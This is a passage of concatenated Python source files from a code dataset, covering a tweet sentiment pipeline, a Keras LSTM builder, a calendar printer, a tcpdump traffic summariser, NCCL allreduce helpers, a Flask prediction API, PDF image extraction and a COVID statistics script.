merge_datasets(or_df = ori.df, \n or_data = ori.df_words, \n ref_data = ref_words)\n\n # store datetime as string\n new_words.created_at_h = new_words.created_at_h.astype(str)\n ori.df.created_at_h = ori.df.created_at_h.astype(str)\n\n # add new data into cumulative datasets\n time_as_filename = 'created_at_' + str(current_time_s).replace(\" \",\"_\")\n new_sentiments.to_csv(data_dest + 'data_cumulative/sentiments/' + time_as_filename + '.csv', index=False)\n new_emotions.to_csv(data_dest + 'data_cumulative/emotions/'+ time_as_filename + '.csv', index=False)\n new_words.to_json(data_dest + 'data_cumulative/words/'+ time_as_filename +'.json', orient='records', lines=True)\n ori.df.to_json(data_dest + 'data_cumulative/original/'+ time_as_filename +'.json', orient='records', lines=True)\n\n # correct datetime data type\n new_words.created_at_h = pd.to_datetime(new_words.created_at_h)\n ori.df.created_at_h = pd.to_datetime(ori.df.created_at_h)\n\n print(' Updated cumulative data: sentiments, emotions, words, and original.')\n\n\n\n cum_retweet = pd.read_json(data_dest + \"data_cumulative/retweet/2020_all_retweets.json\",\n lines=True, orient='records')\n fix_RT_id(cum_retweet)\n\n # overwrite retweet data\n if new_retweet: \n cum_retweet = cum_retweet.append(rt.df)\n\n cum_retweet = cum_retweet.drop_duplicates(subset = 'RT_id')\n cum_retweet.created_at_h = cum_retweet.created_at_h.astype(str)\n \n cum_retweet.to_json(data_dest + \"data_cumulative/retweet/2020_all_retweets.json\",\n lines=True, orient='records')\n print(' Updated cumulative data: retweet.')\n\n file_loc = 'data_cumulative/retweet/'\n\n rt.df_words = rt.df_words.reset_index()\n rt.df_sentiments = rt.df_sentiments.reset_index()\n rt.df_top_emotions = rt.df_top_emotions.reset_index()\n\n ref_words = ref_words.append(rt.df_words)\n ref_words.created_at_h = ref_words.created_at_h.astype(str)\n ref_sentiments = ref_sentiments.append(rt.df_sentiments)\n ref_emotions = ref_emotions.append(rt.df_top_emotions)\n\n ref_words.append(rt.df_words).to_json(data_dest + file_loc + '2020_all_words.json', orient='records', lines=True)\n ref_sentiments.to_csv(data_dest + file_loc + '2020_all_sentiments.csv', index=False)\n ref_emotions.to_csv(data_dest + file_loc + '2020_all_emotions.csv', index=False) \n print(' Updated cumulative data: retweet-words, sentiments, and emotions.')\n\n\n # # correct data types\n # fix_datetime(cum_retweet)\n # fix_datetime(ref_sentiments)\n # fix_datetime(ref_emotions)\n # fix_datetime(ref_words)\n # fix_token_counter(ref_words)\n\n\n ## initial files\n #pd.DataFrame(new_files_1, columns = {'name'}).to_csv('data_filenames/files_read_BLM_tweet_original.csv', index=False)\n #pd.DataFrame(new_files_2, columns = {'name'}).to_csv('data_filenames/files_read_BLM_tweet_retweet.csv', index=False)\n\n # append new file names \n if new_original:\n new_files_1s = [file.split(data_source)[1] for file in new_files_1]\n\n pd.DataFrame(new_files_1s, \n columns = {'name'}\n ).to_csv(data_dest + 'data_filenames/files_read_BLM_tweet_original.csv', \n mode='a', header=False, index=False)\n\n if new_retweet: \n new_files_2s = [file.split(data_source)[1] for file in new_files_2]\n\n pd.DataFrame(new_files_2s, \n columns = {'name'}\n ).to_csv(data_dest + 'data_filenames/files_read_BLM_tweet_retweet.csv', \n mode='a', header=False, index=False)\n\n\n if new_original: del new_sentiments, new_emotions, new_words, ori, rt\n if new_retweet: del cum_retweet, ref_sentiments, ref_emotions, ref_words\n\n\n '''\n Stage 2: Process data into 
data_cumulative/city_date data \n\n '''\n cities = ['Minneapolis','LosAngeles','Denver','Miami','Memphis',\n 'NewYork','Louisville','Columbus','Atlanta','Washington',\n 'Chicago','Boston','Oakland','StLouis','Portland',\n 'Seattle','Houston','SanFrancisco','Philadelphia','Baltimore']\n\n \n city_filterwords = {\n 'Minneapolis': ['Minneapolis','mlps', ['St', 'Paul']],\n 'LosAngeles':['LosAngeles','LA', ['Los', 'Angeles']],\n 'Denver': ['Denver', 'DEN'],\n 'Miami': ['Miami'],\n 'Memphis': ['Memphis'],\n 'NewYork': ['NewYork',['New','York'], 'NY','NYC','manhattahn'],\n 'Louisville': ['Louisville'],\n 'Columbus': ['Columbus'],\n 'Atlanta': ['Atlanta'],\n 'Washington': ['Washington','DC','WashingtonDC'],\n 'Chicago': ['Chicago'],\n 'Boston': ['Boston'],\n 'Oakland': ['Oakland'],\n 'StLouis': ['StLouis',['St','Loius']],\n 'Portland': ['Portland'],\n 'Seattle': ['Seattle'],\n 'Houston': ['Houston'],\n 'SanFrancisco': ['SanFrancisco','SF',['San','Francisco']],\n 'Philadelphia': ['Philadelphia'],\n 'Baltimore': ['Baltimore']\n }\n\n cities_all = ['all_v1','all_v2','all_v3','all_v4','all_v5']\n \n #data_dest = '/Users/kotaminegishi/big_data_training/python/dash_demo1/'\n # data_dest = '/data/app_data/'\n \n data_dest_files = data_dest + 'data_cumulative/'\n days_to_keep = 1 # files to read within x days\n days_to_process = 2 # original tweet ids to match within x days \n\n # current_time = datetime.utcnow() + pd.DateOffset(hours=-6)\n # current_time_s = current_time.strftime('%Y-%m-%d %H:%M:%S')\n\n # current_time_s = pd.to_datetime(current_time_s)\n base_timestamp = current_time_s.floor('h')\n #base_timestamp = pd.to_datetime(datetime(2020,7,20))\n\n print('Going to process city_date data: ', base_timestamp) \n\n\n # for city in cities:\n\n # # Parent Directory path \n # parent_dir = data_dest + \"data_cumulative/city_date/\"\n\n # # Path \n # path = os.path.join(parent_dir, city) \n\n # dir_exist = os.path.isdir(path)\n\n # if not dir_exist:\n # # Create the directory \n # os.mkdir(path) \n # os.mkdir(path + '/original') \n # os.mkdir(path + '/retweet') \n # os.mkdir(path + '/sentiments') \n # os.mkdir(path + '/emotions')\n # os.mkdir(path + '/words') \n # print(\"City_date directory for '%s' created\" %city) \n\n\n files_retweet = [data_dest + 'data_cumulative/retweet/2020_all_retweets.json']\n\n\n files_all_original = keep_recent_files(\n glob(data_dest_files + 'original/*'), # not everything may not be read via S3 mount\n base_timestamp, \n file_type= '.json', \n days = days_to_keep, no_newer=True)\n\n files_all_sentiments = keep_recent_files(\n glob(data_dest_files + 'sentiments/*'), \n base_timestamp, \n file_type= '.csv', \n days = days_to_keep, no_newer=True)\n\n files_all_emotions = keep_recent_files(\n glob(data_dest_files + 'emotions/*'), \n base_timestamp, \n file_type= '.csv', \n days = days_to_keep, no_newer=True)\n\n files_all_words = keep_recent_files(\n glob(data_dest_files + 'words/*'), \n base_timestamp, \n file_type= '.json', \n days = days_to_keep, no_newer=True)\n\n try:\n # read previous filenames\n files_existing_original = pd.read_csv(data_dest + 'data_filenames/files_read_original.csv')\n files_existing_sentiments = pd.read_csv(data_dest + 'data_filenames/files_read_sentiments.csv')\n files_existing_emotions = pd.read_csv(data_dest + 'data_filenames/files_read_emotions.csv')\n files_existing_words = pd.read_csv(data_dest + 'data_filenames/files_read_words.csv')\n\n # get new file names \n files_original = [file for file in files_all_original if 
file.split(data_dest_files)[1] not in np.array(files_existing_original.name)]\n files_sentiments = [file for file in files_all_sentiments if file.split(data_dest_files)[1] not in np.array(files_existing_sentiments.name)]\n files_emotions = [file for file in files_all_emotions if file.split(data_dest_files)[1] not in np.array(files_existing_emotions.name)]\n files_words = [file for file in files_all_words if file.split(data_dest_files)[1] not in np.array(files_existing_words.name)]\n\n mode = 'a'\n header = False\n\n except:\n # initialize filenames \n files_original = files_all_original\n files_sentiments = files_all_sentiments\n files_emotions = files_all_emotions\n files_words = files_all_words\n mode = 'w'\n header = True\n\n\n '''\n process data for cities and cities_all\n '''\n\n print('Going to process the following retweet files:', files_retweet)\n retweet_files_by_city_json(files_retweet, cities, city_filterwords, data_dest, verbose=True)\n\n df_retweet = pd.read_json(files_retweet[0], orient='records',lines=True)\n for c in cities_all:\n filename = data_dest + 'data_cumulative/city_date/' + c + '/retweet/2020_all_retweets.json'\n df_retweet.to_json(filename, orient='records',lines=True)\n print('updated ', filename)\n\n print('Going to process the following original files:', files_original)\n original_files_by_city_date_json(files_original, cities, city_filterwords, data_dest, verbose=True)\n \n original_files_by_city_date_json(files_original, cities_all, [], \n data_dest, verbose=True, city_type='all', sample_frac=.1)\n\n\n print('Going to process the following sentiments files:', files_sentiments)\n files_id_matched_by_city_date_json(\n files_sentiments, cities + cities_all, data_dest, 'sentiments', \n base_timestamp, process_days = days_to_process,\n file_type='.csv', verbose=True)\n\n\n print('Going to process the following emotions files:', files_emotions)\n files_id_matched_by_city_date_json(\n files_emotions, cities + cities_all, data_dest, 'emotions', \n base_timestamp, process_days = days_to_process,\n file_type='.csv', verbose=True)\n\n\n print('Going to process the following words files:', files_words)\n files_id_matched_by_city_date_json(\n files_words, cities + cities_all, data_dest, 'words', \n base_timestamp, process_days = days_to_process,\n file_type='.json', verbose=True)\n\n \n # update filenames for those that are read and processed\n files_original_s = [file.split(data_dest_files)[1] for file in files_original]\n files_sentiments_s = [file.split(data_dest_files)[1] for file in files_sentiments]\n files_emotions_s = [file.split(data_dest_files)[1] for file in files_emotions]\n files_words_s = [file.split(data_dest_files)[1] for file in files_words]\n\n\n files_read_update(files_original_s, \n data_dest + 'data_filenames/files_read_original', mode=mode, header =header)\n\n files_read_update(files_sentiments_s, \n data_dest + 'data_filenames/files_read_sentiments', mode=mode, header =header)\n\n files_read_update(files_emotions_s, \n data_dest + 'data_filenames/files_read_emotions', mode=mode, header =header)\n\n files_read_update(files_words_s, \n data_dest + 'data_filenames/files_read_words', mode=mode, header =header)\n\n \n\n\n '''\n \tStage 3: Pre-calculate statistics for data_current/city and data_cumulative/city_date/stat \n '''\n # Execute the following when \"update_current_data = True\"\n # This section updates data for the unfiltered data using a small sample\n if update_current_data:\n print('\\nUpdating current data files...')\n \n process_timestamp 
= base_timestamp\n print('process_timestamp: ', process_timestamp) \n current_datetime = process_timestamp.floor('h')\n \n # include potential repair candidates for the past hrs of the same date \n all_stats_datetime = [str(current_datetime + pd.Timedelta(-h, unit='h')) for h in range(1, current_datetime.hour)]\n #all_stats_datetime = [str(current_datetime + pd.Timedelta(-h, unit='h')) for h in range(1,24)]\n\n try:\n # read previous filenames\n existing_stats_datetime = pd.read_csv(data_dest + 'data_filenames/files_stats.csv')\n # get new file names \n repair_stats_datetime = [datetime for datetime in all_stats_datetime if datetime not in list(existing_stats_datetime.datetime)]\n if len(repair_stats_datetime)>0: print('Repairing city_date stats for the following datetime: ', repair_stats_datetime)\n mode = 'a'\n header = False\n\n except:\n # initialize filenames \n repair_stats_datetime = all_stats_datetime\n mode = 'w'\n header = True\n\n\n stats_datetime = repair_stats_datetime.copy()\n stats_datetime.append(str(current_datetime))\n \n update_current_data_city(cities_all + cities, data_dest, process_timestamp, repair_stats_datetime)\n\n files_read_update(stats_datetime, \n data_dest + 'data_filenames/files_stats', colname = 'datetime', mode=mode, header =header)\n print('city_date stats updated for: ', stats_datetime)\n\n\n\nif __name__==\"__main__\":\n\n import nltk\n nltk.download('vader_lexicon') \n nltk.download('stopwords')\n nltk.download('averaged_perceptron_tagger')\n nltk.download('wordnet')\n nltk.download('punkt')\n\n counter = 1\n while True: # run continuously until stopped\n print('\\n---------------------- counter: ', counter, \n '-------------------------')\n\n process_new_data()\n \n counter = counter +1\n time.sleep(3600) # 3600 seconds of sleep \n\n\n\n\n","sub_path":"container_data_processing/archive/process_data3.py","file_name":"process_data3.py","file_ext":"py","file_size_in_byte":18730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"91674102","text":"from params_and_consts import learning_rate\nimport tensorflow as tf\n\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, batch_input_shape=[batch_size, None]),\n tf.keras.layers.LSTM(\n rnn_units, \n return_sequences=True, \n recurrent_activation='sigmoid',\n stateful=True,\n dropout = 0.4,\n ),\n tf.keras.layers.Dense(vocab_size)\n ])\n\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])\n\n return model","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"306279356","text":"def leap_year(year):\n if year > 0:\n if year % 400 == 0:\n return \"True\"\n elif year % 100 == 0:\n return \"False\"\n elif year % 4 == 0:\n return \"True\"\n else:\n return \"False\"\n else:\n print(\"Years must be later than 0\")\n\ndef day_of_the_week(year, month, day):\n\tt = [0, 3, 2, 5, 0, 3, 5, 1, 4, 6, 2, 4]\n\tyear -= month < 3\n\treturn (year + int(year/4) - int(year/100) + int(year/400) + t[month-1] + day) % 7\n\ndef calendar(month, year):\n day_during_week = day_of_the_week(year, month, 1)\n if month == 1:\n month_year = \"January\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n 
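Assuming TensorFlow is installed, the build_model function above can be smoke-tested with toy sizes (all values illustrative, not the project's real hyperparameters):

model = build_model(vocab_size=65, embedding_dim=256,
                    rnn_units=512, batch_size=1)
model.summary()   # prints the Embedding -> LSTM -> Dense stack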
days_in_month = 31\n    elif month == 2:\n        month_year = \"February\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        if leap_year(year) == \"True\": # leap_year returns the strings \"True\"/\"False\", not booleans\n            days_in_month = 29\n        else:\n            days_in_month = 28\n    elif month == 3:\n        month_year = \"March\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 31\n    elif month == 4:\n        month_year = \"April\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 30\n    elif month == 5:\n        month_year = \"May\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 31\n    elif month == 6:\n        month_year = \"June\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 30\n    elif month == 7:\n        month_year = \"July\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 31\n    elif month == 8:\n        month_year = \"August\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 31\n    elif month == 9:\n        month_year = \"September\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 30\n    elif month == 10:\n        month_year = \"October\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 31\n    elif month == 11:\n        month_year = \"November\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 30\n    elif month == 12:\n        month_year = \"December\" + \" \" + str(year)\n        print(f\"{month_year:^28}\\n\")\n        days_in_month = 31\n\n    print(\" S  M  T  W  T  F  S\\n\")\n\n    for spaces in range(day_during_week):\n        print(\"   \", end=\"\")\n\n    for day in range(1, days_in_month+1):\n        print(f\"{day:>3}\", end=\" \")\n        day_during_week = day_during_week + 1\n        if day_during_week == 7:\n            print(\"\\n\")\n            day_during_week = 0\n\nmonth = int(input(\"Month for your calendar: \"))\nyear = int(input(\"Year for your calendar (Any year after 1970): \"))\n\ncalendar(month, year)\n\n# print(day_of_the_week(year, month, 1))","sub_path":"projects/dynamic_calendar.py","file_name":"dynamic_calendar.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"408076680","text":"#!/usr/bin/python3\n#Program written By: Phil King. Assignment1 for SRT311- Professor Silva\nimport re #Used for Regex\nimport sys #Used for Standard inputs\n\ndef check_ips(argvs): # This function is fed a standard input\n    if ip_ex.fullmatch(argvs): #If the standard input is 4 numbers separated by 3 periods then continue\n        seclist=argvs.split('.')\n        for section in seclist: #Check each number\n            if int(section) > 255: #To see if any of them are over 255. 
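The month branches above can be collapsed into lookup tables. A self-contained sketch using a boolean leap test instead of string comparison:

MONTHS = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
          'August', 'September', 'October', 'November', 'December']
DAYS = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]

def month_info(month, year):
    days = DAYS[month - 1]
    if month == 2 and year % 4 == 0 and (year % 100 != 0 or year % 400 == 0):
        days = 29
    return MONTHS[month - 1], days

print(month_info(2, 2020))   # ('February', 29)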
The nature of this regex \n                return(False) #protects against negative numbers\n        return(True)\n    return(False) \n\ndef check_options(argvs): #This function is fed a standard input\n    if \"-s\" in argvs: #This function checks to see if -s was entered.\n        return(True)\n    return(False)\n\ndef portStripper(ip): #This function is fed a list of numbers\n    return(ip[0]+\".\"+ip[1]+\".\"+ip[2]+\".\"+ip[3]) #Returns the 4 ip numbers separated by periods \n\ndef repeatChecker(Source, Dest, Length): #This function checks for duplicate source/ destination pairs\n    counter=0 #Keeps track of location in list\n    for entry in combinations: \n        if Source+' '+Dest == entry.split()[0]+' '+entry.split()[1]: #If a duplicate is found \n            if Length==0: #exit if the length is 0\n                return True\n            else: #Otherwise add the lengths together \n                combinations[counter]=Source+' '+Dest+' '+str(int(Length)+int(entry.split()[2]))\n                return True\n        counter+=1 \n    return(False)\n    \ndef parse_file(file): #This function parses the tcp dump file\n    with open(file,\"r\") as tcpdump: \n        for line in tcpdump:\n            templine=line.split() #For each line it stores the split line\n            try: \n                try:\n                    Length=int(templine[-1])\n                except TypeError: #Expected as some lengths are surrounded with brackets\n                    Length=templine[-1][1:-1]\n\n                Source=portStripper(templine[2].split('.'))\n                Dest=portStripper(templine[4].split('.'))\n                if not repeatChecker(Source,Dest,Length): #If no repeats are found append the new pair to the list.\n                    combinations.append(Source+' '+Dest+' '+str(Length)) \n            except (IndexError, ValueError): #Expected errors for TCP dump lines with information that we don't want\n                continue\n    \n\n\ndef sort_list(): #Sorts the prepared list\n    for passnum in range(len(combinations)-1,0,-1):\n        for i in range(passnum): #used bubblesort\n            a=combinations[i].split()[2]\n            b=combinations[i+1].split()[2]\n            if int(a)<int(b): #Swap the pair so the list ends up in descending order of length\n                temp=combinations[i]\n                combinations[i]=combinations[i+1]\n                combinations[i+1]=temp\n\ndef print_line(entry): #Formats a 'Source Dest Length' entry as one output line\n    return('Source: '+entry.split()[0]+' Dest: '+entry.split()[1]+' Length: '+entry.split()[2]+'\\n')\n\ndef print_file(): #Prints the results to the screen or saves them to results.txt\n    if len(validips)>2:\n        print('I do not know what you want')\n    elif len(validips)==2: #If 2 then just print the line, if it exists, onto the screen\n        for check in combinations:\n            if check.split()[0] == validips[0] and check.split()[1] == validips[1]:\n                print(print_line(check))\n                break\n    elif len(validips)==1: #If 1 print the line with the sought after Source into results.txt\n        results = open(\"results.txt\", \"w\") \n        for check in combinations:\n            if check.split()[0] == validips[0]:\n                results.write(print_line(check))\n        results.close()\n        print('Results saved in results.txt')\n    else: #Otherwise prints the entire list into results.txt\n        results = open(\"results.txt\", \"w\")\n        for check in combinations:\n            results.write(print_line(check))\n        results.close() \n        print('Results saved in results.txt') \n\ncombinations= list() #Stores the ip, dest, and lengths\nsort = False #Holds the sort option\nvalidips = list() #Holds the list of valid ips.\nip_ex = re.compile(r\"[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\") #Is the regex used to check if ips are valid\nfor argvs in sys.argv:\n    if not sort and check_options(argvs):\n        sort=True\n    elif check_ips(argvs) :\n        validips.append(argvs)\n    else:\n        fn=argvs #fn holds the filename\ntry: \n    parse_file(fn) \n    if sort:\n        sort_list()\n    print_file()\nexcept FileNotFoundError: \n    print(\"File not found\")","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"568439481","text":"\n\"\"\"Cuda op Python library.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import 
print_function\n\nimport os.path\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom blocksparse.ewops import float_cast\n\ndata_files_path = tf.resource_loader.get_data_files_path()\n_op_module = tf.load_op_library(os.path.join(data_files_path, 'blocksparse_ops.so'))\n\n\n############################## Nccl Ops #####################################\n\nop_counter = 0\ninit_num_comms = None\ninit_prereduce = None\n\ndef allreduce(x, sync_size=0, num_comms=2, logfile=\"\", rank=0, prereduce=0, name=None):\n    assert not x.op.device or x.op.device[-2:] == \":0\", \"Only one gpu per process currently supported by allreduce: \" + x.op.device\n    global op_counter\n    global init_num_comms\n    global init_prereduce\n\n    if init_num_comms is None:\n        init_num_comms = num_comms\n    elif init_num_comms != num_comms:\n        print(\"Warning: only the first value of num_comms (%d) that was passed in will be used. num_comms=%d value ignored.\" % (init_num_comms, num_comms))\n\n    if init_prereduce is None:\n        init_prereduce = prereduce\n    elif init_prereduce != prereduce:\n        print(\"Warning: only the first value of prereduce (%d) that was passed in will be used. prereduce=%d value ignored.\" % (init_prereduce, prereduce))\n\n    if logfile and rank == 0:\n        print(\"%03d %s\" % (op_counter, x.name))\n    ret = _op_module.allreduce_nccl(x, op_num=op_counter, sync_size=sync_size, num_comms=num_comms, prereduce=prereduce, logfile=logfile, name=name)\n    op_counter += 1\n    return ret\n\n\ndef group_allreduce(grads, parms, search_strings=None, cast_map=None, cast_all=None, num_comms=2, prereduce=0):\n\n    # if no grouping specified, create one group to reduce at the end (no overlap with compute)\n    if search_strings is None:\n        search_strings = [\"group_allreduce_all\"]\n\n    groups = [(name, list(), list()) for name in search_strings]\n\n    for i, (grad, param) in enumerate(zip(grads, parms)):\n        for name, group16, group32 in groups:\n            if name == search_strings[-1] or name in param.name:\n\n                if cast_all is not None:\n                    grad = float_cast(grad, dtype=cast_all)\n\n                elif cast_map is not None and name in cast_map:\n                    grad = float_cast(grad, dtype=cast_map[name])\n\n                if grad.dtype.base_dtype is tf.float16:\n                    group16.append((i, grad, param))\n                else:\n                    group32.append((i, grad, param))\n                break\n\n    for name, group16, group32 in groups:\n        count = 0\n        for group in (group16, group32):\n            count += len(group)\n            if len(group) > 0:\n                if len(group) == 1:\n                    concated = group[0][1]\n                else:\n                    concated = tf.concat([tf.reshape(grad, [-1]) for _, grad, _ in group], 0, name=\"concat_\"+name)\n\n                reduced = allreduce(concated, num_comms=num_comms, prereduce=prereduce)\n\n                if len(group) == 1:\n                    grads[group[0][0]] = reduced\n                else:\n                    offset = 0\n                    for i, grad, param in group:\n                        size = param.shape.num_elements()\n                        grads[i] = tf.reshape(reduced[offset: offset + size], param.shape)\n                        offset += size\n\n        if count == 0:\n            print(\"Warning: no grads found for all_reduce group: \", name)\n\n    # nothing to return, grads modified in place\n\ndef sync_variables_op(mpi_rank, num_comms=2, prereduce=0):\n    ops = list()\n    prev = []\n    with tf.device(\"/gpu:0\"):\n        for var in tf.trainable_variables():\n            with tf.control_dependencies(prev):\n                op = tf.assign(var, allreduce(var if mpi_rank == 0 else var * 0.0, num_comms=num_comms, prereduce=prereduce))\n                prev = [op]\n            ops.append(op)\n\n    return 
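The concat/reduce/split bookkeeping in group_allreduce is easiest to see without NCCL. A NumPy sketch where a plain sum stands in for the cross-rank reduction:

import numpy as np

grads = [np.ones((2, 3)), np.ones(4)]
flat = np.concatenate([g.ravel() for g in grads])
reduced = flat + flat                     # stand-in for the NCCL allreduce
out, off = [], 0
for g in grads:
    out.append(reduced[off:off + g.size].reshape(g.shape))
    off += g.size
print([o.shape for o in out])             # [(2, 3), (4,)]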
tf.group(*ops)\n\n\n","sub_path":"blocksparse/nccl.py","file_name":"nccl.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"517066129","text":"#!/usr/bin/env python2.7\n# coding: utf-8\nimport numpy as np\nfrom flask import Flask, request, jsonify\n# import pickle\nfrom joblib import dump, load\n\napp = Flask(__name__)\nmodel = load(open('model.joblib','rb'))\n\n@app.route('/api',methods=['POST'])\ndef predict():\n    data = request.get_json(force=True)\n    prediction = model.predict([np.array(data['features'])])\n    output = prediction[0]\n    return jsonify(output)\n\nif __name__ == '__main__':\n    app.run(port=5000, debug=True)","sub_path":"KNNServer.py","file_name":"KNNServer.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"147061104","text":"import argparse\nimport logging\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--loglevel', default='WARNING')\n# parser.add_argument('--loglevel', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], default='WARNING')\nargs = parser.parse_args()\n\nnumeric_level = getattr(logging, args.loglevel.upper(), None)\nif not isinstance(numeric_level, int):\n    raise ValueError(f'Invalid log level: {args.loglevel}')\nlogging.basicConfig(level=numeric_level)\n\nlogging.debug('debug log')\nlogging.info('info log')\nlogging.warning('warning log')\nlogging.error('error log')\n","sub_path":"ex3_level_cmd.py","file_name":"ex3_level_cmd.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"372812907","text":"# @author jiangshiyi\n# @python 3.6.4\n#\n#\n# @time 2018.10.1\nfrom pathlib import Path\nimport csv\nimport re\n\n\nbase_dir = Path(__file__).cwd()\ndata = base_dir.joinpath(\"data\")\n\ndef print_infos(infos,item):\n    \"\"\"\n    infos: a string listing the fields to print (\"*\" for all)\n    item : an ordered dict\n    prints the requested fields of the item\n    \"\"\"\n    if infos == \"*\":\n        for i in item:\n            print(i + \":\" + item[i],end=\" \")\n        print(\"\")\n    else:\n        parms = infos.split(\",\")\n        for parm in parms:\n            print(parm + \":\" + item[parm],end=\" \")\n        print(\"\")\n\ndef check_item_condition(item,condition):\n    \"\"\"\n    item : an ordered dict\n    condition : a condition string\n    checks whether the item satisfies the condition\n    \"\"\"\n    is_between_and = re.compile(r\"(\\w+) between (\\w+) and (\\w+)\",re.IGNORECASE).match(condition)\n    # e.g. \"id = 1\"\n    is_single_condition = re.compile(r\"([\\w\\s]+)([=<>]+)([\\w\\s]+)\",re.IGNORECASE).match(condition)\n\n    if is_between_and:\n        parm = is_between_and.group(1)\n        begin = int(is_between_and.group(2))\n        end = int(is_between_and.group(3))\n        \n        if parm not in item.keys():\n            print(\"Error parm!\")\n            return False\n        \n        if int(item[parm]) <= end and int(item[parm]) > begin:\n            return True\n        else:\n            return False\n    \n    if is_single_condition:\n        left = is_single_condition.group(1).strip()\n        right = is_single_condition.group(3).strip()\n        operator = is_single_condition.group(2).strip()\n        \n        if left not in item.keys():\n            print(\"Error parm!\")\n            return False\n        \n        if operator == \"=\" and item[left] == right:\n            return True\n        elif operator == \">\" and item[left] > right:\n            return True\n        elif operator == \"<\" and item[left] < right:\n            return True\n        elif operator == \">=\" and item[left] >= right:\n            return True\n        elif operator == \"<=\" and item[left] <= right:\n            return True\n        else:\n            return 
False\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"421758230","text":"import fitz\n\ndoc = fitz.open(\"documents/addavichi.pdf\")\n\nfor x in range(len(doc)):\n for img in doc.getPageImageList(x):\n xref = img[0]\n pix = fitz.Pixmap(doc, xref)\n if pix.n < 5:\n pix.writePNG(\"p%s-%s.png\" % (x, xref))\n else:\n pix1 = fitz.Pixmap(fitz.csRGB, pix)\n pix1.writePNG(\"p%s-%s.png\" % (x, xref))\n pix1 = None\n pix = None","sub_path":"algorithm/testing/imageconvert.py","file_name":"imageconvert.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"479873936","text":"import json\nfrom datetime import datetime\n\nimport contextily as ctx\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nmap_zip = \"zip://./src/Salzburg.zip!Salzburg_BEV_VGD_250_LAM.shp\"\nreport_dir = \"./docs/report/\"\n\n\ndef main():\n # get Up to date covid Data\n raw_data = pd.read_csv(report_dir + 'aktiv.csv').set_index('Gemeinde')\n last_updated = datetime.strptime(raw_data.columns[-1], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n # rename last column\n covid_data = pd.DataFrame()\n covid_data['sevenDaysMean'] = raw_data.iloc[:, -7:].mean(axis=1)\n covid_data['sevenDaysMeanYesterday'] = raw_data.iloc[:, -8:-1].mean(axis=1)\n covid_data['sevenDaysMeanChange'] = covid_data['sevenDaysMean'] - covid_data['sevenDaysMeanYesterday']\n\n # add deaths\n death_data = pd.read_csv(report_dir + 'verstorben.csv').set_index('Gemeinde')\n covid_data['Verstorben'] = death_data.iloc[:, -1:]\n\n # get Population for relative numbers\n with open(report_dir + \"population.json\") as population_file:\n population = json.load(population_file)\n population = pd.DataFrame(population, index=[\"population\"])\n\n # some fixes of uncategorized population\n population['Flachgau - Nicht zugeordnet'] = population['Flachgau']\n population['Tennengau - Nicht zugeordnet'] = population['Tennengau']\n population['Pongau - Nicht zugeordnet'] = population['Pongau']\n population['Pinzgau - Nicht zugeordnet'] = population['Pinzgau']\n population['Lungau - Nicht zugeordnet'] = population['Lungau']\n population['Stadt Salzburg - Nicht zugeordnet'] = population['Salzburg Stadt']\n\n covid_data = covid_data.join(population.transpose())\n covid_data['population'] = covid_data['population'].fillna(0).astype(int)\n\n covid_data['relativeActive'] = covid_data['sevenDaysMean'] / covid_data['population'] * 100000\n covid_data['relativeActiveYesterday'] = covid_data['sevenDaysMeanYesterday'] / covid_data['population'] * 100000\n covid_data['relativeActiveChange'] = covid_data['relativeActive'] - covid_data['relativeActiveYesterday']\n\n covid_data['active'] = raw_data.iloc[:, -1:]\n covid_data['activeYesterday'] = raw_data.iloc[:, -2:-1]\n covid_data['activeChange'] = covid_data['active'] - 